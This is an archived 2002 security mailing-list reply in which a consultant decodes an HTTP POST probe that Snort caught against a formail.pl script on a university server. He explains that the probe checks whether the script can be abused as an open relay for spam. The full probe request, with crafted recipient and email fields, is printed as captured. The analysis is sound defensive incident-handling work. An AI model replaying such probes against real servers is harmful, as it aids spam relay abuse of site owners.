Hi Russell I don't see any fancy unicode or DOS commands in here, so I would say it is a relatively harmless probe for open formmail relays, probably for spam use. There are a number of automated tools that look for old formail.pl programs to exploit as relays. The POST translated to plain text follows ( the backslash breaks are mine for readability ) : --------------------------------------------------------------- POST /cgi-bin/formail.pl HTTP/1.0 Via: 1.0 SERVER Connection: Keep-Alive Content-Length: 402 User-Agent: Mozilla/4.06 (Win95; I) Content-Type: application/x-www-form-urlencoded Host: www.cs.auckland.ac.nz Accept: image/gif, image/x-xpixmap, image/jpeg, application/msword, */* Referer: www.cs.auckland.ac.nz email=daa18at_private&recipient=<iikestyxat_private>www.cs.auckland.ac.nz\ &subject=www.cs.auckland.ac.nz/cgi-bin/formail.pl oxy52\ &= time/date: 08:20:19pm / 09/04/2002 <A HREF="www.cs.auckland.ac.nz/cgi-bin/formail.pl">\ www.cs.auckland.ac.nz/cgi-bin/formail.pl</A> oxy52 --------------------------------------------------------------- It seems to be probing formail and getting it to send an Email back to the spammer containing a URL for the vulnerable formail. I've checked Google for "oxy52" but found nothing, its probabaly just a tag for whoever is receiving the mail. Kerry Russell Fulton said: > Hi All, > Over the last week or so snort has been picking up many probes like > this: > [snip] -- Kerry Thompson, CISSP Information Systems Security Consultant http://www.crypt.gen.nz kerryat_private ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Thu Sep 05 2002 - 14:18:55 PDT